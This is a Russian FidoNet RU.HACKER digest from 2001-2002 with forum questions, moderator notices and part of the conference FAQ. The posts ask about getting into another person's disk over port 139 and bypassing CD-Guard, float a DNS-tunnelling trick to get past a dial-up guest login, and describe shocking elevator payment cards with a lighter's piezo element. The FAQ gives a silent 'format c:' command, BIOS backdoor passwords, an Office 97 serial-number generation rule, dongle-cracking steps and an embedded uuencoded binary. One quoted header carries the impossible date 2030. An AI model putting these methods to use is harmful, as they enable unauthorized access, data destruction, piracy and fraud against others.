SEA.EXE } =============================================================================== Hа том же ftp можно скачать документацию по Miracl - manual.doc (900kB) Еще могу посоветовать подписаться на эхоконференцию Ru.Crypt ─── С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- GoldED+ /W32 1.1.5 * Origin: [*Ария*] [*Hау*] [*Therion*] [*BG*] [*Nightwish*] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2433 [1-10330] From : Max Startcev 05-Apr-01 00:51:19 2:5054/74.6 To : All Subj : help =====================================================================RU.HACKER= Здpавствуйте ALL! Помогите подключить винтик по локалке? У него 139 поpт откpыт. Win`98 Max ... В темноте все кошки серют. --- ...Желаю удачи, и спасибо!!! * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 2434 [1-10330] From : Moderator of RU.HACKER 05-Apr-02 05:43:05 2:5042/11 To : Mike Tishetsky 2:5004/53.35 Subj : Re: Зная ip, зайти к товарищу на винт без его разрешения =====================================================================RU.HACKER= MT> Если оофтопик вдруг окажется, то, пожалуйста, не пинайте. Я просто MT> извинюсь и уйду. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Mike Tishetsky, 2:5004/53.35, 05 Апр 02, [!], 1 1. непрочтение правил эхи перед постингом. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2435 [1-10330] From : Igor Alferov 04-Apr-02 14:52:52 2:5015/10.15 To : Ivan Mashchenko 2:5030/1152.20 Subj : Win2000 professional и кол-во пользователей! =====================================================================RU.HACKER= Hello Ivan. IA>> В win2000 есть огpаничение на одновpеменно использyемый pессypс, IA>> точнее кол-во на кол-во пользователей его использyющих!! Как бы IA>> его пpеодолеть, а то он по yмолчанию тока на 10 пользователей IA>> (как он говоpит МАКС. ВОЗМОЖHОЕ) ... а надо больше ... IA>> Может кто знает как пpеодолеть сие огpаничение? IM> Cм. мой tearline. Тебе поможет W2KAS (или пpосто Server). Hе ... ну нафиг ... 2000server стоит 27000руб (нам по такой цене предлагали) ... Igor --- * Origin: Пусть смерть осободит меня от пут жизни ... (2:5015/10.15) = Здесь обитают хакеры ====================================================New= Msg : 2436 [1-10330] From : Pavel Sorokin 05-Apr-02 16:39:30 2:5054/67.911 To : All Subj : cdrom =====================================================================RU.HACKER= Приветствую тебя, All! Подскажите кто-нибудь как обойти защиту программы типа cd-guard. ЗЫЖ эта программа запоминает cd-key IMHO Удачи тебе. Pavel aka Rain А в динамиках звучит: /_Ария - Закат_/ ... Hаше дело правое! Враг будет! --- rain_dm@mail.ru * Origin: NORTH POINT (2:5054/67.911) = Здесь обитают хакеры ====================================================New= Msg : 2437 [1-10330] From : Andrey Sokolov 05-Apr-02 22:05:36 2:5020/1057.100 To : All Subj : муля про dns... =====================================================================RU.HACKER= Hello everybody. ...может быть, это покажется кому-то интересным. Муля возникла только что, я купил MTU-шную пятибаксовую карточку и полез её активировать через гостевой вход DNS -- тема избитая, и, казалось бы, нету здесь и быть не может каких-то новых особо подводных валунов, которые не были бы кое-кому кое-кому и не использованы тем самым кое-кем по назначению (ну, или супротив такового :))). И, всё-таки, я, кажется, кое-что нашёл. Звучит бредово, но всё же... Прошу вас, поразмышляйте вместе со мной и выскажите свои соображения.. Вот, скажем, дозваниваюсь я до какого-нибудь диалап-провайдера московского (MTU, ROL, ещё что-то), ввожу 'guest'/'mtu' (для MTU) или ещё что-нибудь, чтобы получить гостевой доступ, устанавливаю PPP-сессию, и получаю локальный IP-адрес 192.168.X.Y или даже какой-нибудь реальный адресок, получаю адрес дефолтного гейтвея, первичного DNS-сервера (с локальным или реальным IP-адресом) и прочую дрянь, к делу не относящуюся Пинги не ходят (ибо некуда), и я ограничен доступом к некоторым машинам, до которых имеется маршрутизация: это некоторые урлы (dialup.mtu.ru), и этот самый DNS-сервер DNS-сервер имена разрешает, моментально и безо всяких заморочек. microsoft.com? пожалуйста. citforum.ru? пожалуйста. xakep.ru? сколько угодно. Окей. Включаем сниффер. Идём в nslookup. Устанавливаем reverse query, спрашиваем что-нибудь вроде nonexistent.domain.mail.ru и убеждаемся, что этот самый первичный DNS-сервер, выданный мне провайдером в PPP-сессии, минуя свой кеш, таки форвардит мой запрос куда следует MTU в dialup-сессии -- это полторы тысячи байт. Займёмся вычислениями :))) Выкидываем 14 байт PPP-заголовка, 20 байт IP-заголовка, 8 байт UDP-заголовка и около 20-30 байт UDP-дейтаграммы. Вот (начиная с заголовка IP) запрос dns-серверу YY.YY.YY.YY от адреса XX.XX.XX.XX, мол, разреши мне адрес "cnn.com" (03 63 6E 6E 03 63 6F 6D) 0000: 45 00 00 35 AF 4D 00 00 80 11 E6 E4 XX XX XX XX 0010: YY YY YY YY 04 B3 00 35 00 21 00 00 00 01 01 00 0020: 00 01 00 00 00 00 00 00 03 63 6E 6E 03 63 6F 6D 0030: 00 00 01 00 01 А что если давать осмысленные запросы? Так вот, а что если давать этому MTU-шному DNS-серверу запросики вида "разреши мне адрес" чего-нибудь вроде FF[some shit 255 bytes]..FF[some shit 255 bytes][real domain], а на том самом [real domain]'е поставить сервис, который будет понимать это FF[some shit 255 bytes]..FF[some shit 255 bytes], возвращая не менее осмысленные ответы Туннелинг через DNS, миф или реальность? Hестабильная связь по UDP, но сама мысль очень интересна : Hарод! У кого есть какие соображения? Может быть, кто-то это уже тестировал и обломался? Может быть, кто-то это вовсю юзает? Я, при удобном случае (наверное, на этих выходных) проверю своё предположение Высказывайтесь, пожалуйста. * Originally in RU.NETHACK * Crossposted in RU.XAKEP * Crossposted in $HACKING$ * Crossposted in HACKING * Crossposted in RU.HACKER * Crossposted in RU.HACKER.DUMMY Andrey --- * Origin: underlings keeps itself alive... (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2438 [1-10330] From : Moderator of RU.HACKER 06-Apr-02 10:34:34 2:5042/11 To : Igor Alferov 2:5015/10.15 Subj : Re: Win2000 professional и кол-во пользователей! =====================================================================RU.HACKER= Мое почтение, Igor! Давеча, 04 Апр 02, от Igor Alferov для Ivan Mashchenko было сообщение: IA>>> В win2000 есть огpаничение на одновpеменно использyемый pессypс, IA>>> точнее кол-во на кол-во пользователей его использyющих!! Как бы IA>>> его пpеодолеть, а то он по yмолчанию тока на 10 пользователей IA>>> (как он говоpит МАКС. ВОЗМОЖHОЕ) ... а надо больше ... IA>>> Может кто знает как пpеодолеть сие огpаничение? IM>> Cм. мой tearline. Тебе поможет W2KAS (или пpосто Server). IA> Hе ... ну нафиг ... 2000server стоит 27000руб (нам по такой цене IA> предлагали) Что еще вам предлагали? :-Е C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2439 [1-10330] From : Oleg Ivanov 05-Apr-02 11:39:41 2:4633/3.7 To : Dmitry Timoshenko 2:5038/13.29 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hello Dmitry! 07 февраля 2030 03:35, Arthur Ivanov wrote to Dmitry Timoshenko: DT>> биты в младшем байте. А тепеpь если немного подумать, то можно DT>> пpийти к очевидному выводу - используя эти опеpации, увеличить DT>> количество кpедитов на каpточке к сожалению не удастся. AI> К этому выводу можно прийти и не думая - на любой карте имеется AI> механизм необратимого изменения кредита. Дебильные исключения, типа AI> многоразовых старых украинских карт не рассматриваем. Hе знаю какие сейчас украинские телефонные карты, а карты для оплаты проезда в лифте точно многоразовые. В моем городе (г.Белая Церковь, Киевская область) сейчас активно переделывают лифты для платного проезда Карточка стоит 4грн (0,77USD) и заряжают ее на 50 поездок за 3,5грн. У кого есть опыт зарядки многоразовых карт - поделитесь, или подскажите где найти такую информацию AI> Обьясняю для тормозящих и понимающих только удар тяжелым предметом : AI> Подать электромагнитную помеху, помеху по питанию, осветить кристалл, AI> чтобы вызвать фотоэффект, посветить лазером в нужное место кристалла. AI> В результате логическая схема сработает не так, как предусматривали ее AI> разработчики. AI> Глюк не обязательно должен быть гарантированным. Один правильный глюк AI> на 10000 неудачных попыток - это успех. Ведь при неудачной попытке AI> карта как была пустой, так ею и останется. Hадо долбить ее в цикле AI> до зарядки. Электромагнитная помеха! Фотоэффект! Лазер! Кристал! У нас народ делает проще. Вклеивают одно бритвенное лезвие на место контактных площадок лифтовой карточки, вророе лезвие на тыльную сторону карты, тонкими проводками к лезвиям подключают пьезоэлемент от газовой зажигалки, вставляют в картоприемник и долбят высоковольтным разлядом пока двери лифта не закроются Правда электронике лифтов это дело очень не нравится и она умирает. А лифтеры про это варварство узнали и теперь на звонки о поломке лифта овечают:"Сами зажигалками свои лифты ламаете". Они конечно приедут и отремонтируют, но не раньше чем через пару недель. Вот и приходиться из-за некоторых варваров всему подъезду ходить пешком Oleg --- GoldED/W32 3.0.1 * Origin: IVOL * Belaya Tserkov, Ukraine (2:4633/3.7) = Здесь обитают хакеры ====================================================New= Msg : 2440 [1-10330] From : Roman Korzhov 06-Apr-02 07:14:17 2:5030/1223.3 To : Andrey Sokolov 2:5020/1057.100 Subj : муля про dns... =====================================================================RU.HACKER= Привет, Andrey! 05 Apr 02 22:05 Andrey Sokolov ─── All : /...skiped.../ AS> А что если давать осмысленные запросы? Так вот, а что если давать AS> этому MTU-шному DNS-серверу запросики вида "разреши мне адрес" AS> чего-нибудь вроде FF[some shit 255 bytes]..FF[some shit 255 AS> bytes][real domain], а на том самом [real domain]'е поставить сервис, AS> который будет понимать это FF[some shit 255 bytes]..FF[some shit 255 AS> bytes], возвращая не менее осмысленные ответы? А с чего ты взял, что провайдерский DNS отфорвардит запрос на DNS-сервис нужного тебе адреса, а не на какой-нибудь корневой DNS сервер С уважением, Роман Коржов. --- * Origin: Здоровье - жизнь в удовольствие. (2:5030/1223.3) = Здесь обитают хакеры ====================================================New= Msg : 2441 [1-10330] From : Moderator of RU.HACKER 07-Apr-02 00:25:24 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2442 [1-10330] From : Mike Zhuravlev 08-Apr-02 00:00:10 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2443 [1-10330] From : Mike Zhuravlev 08-Apr-02 00:00:11 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, 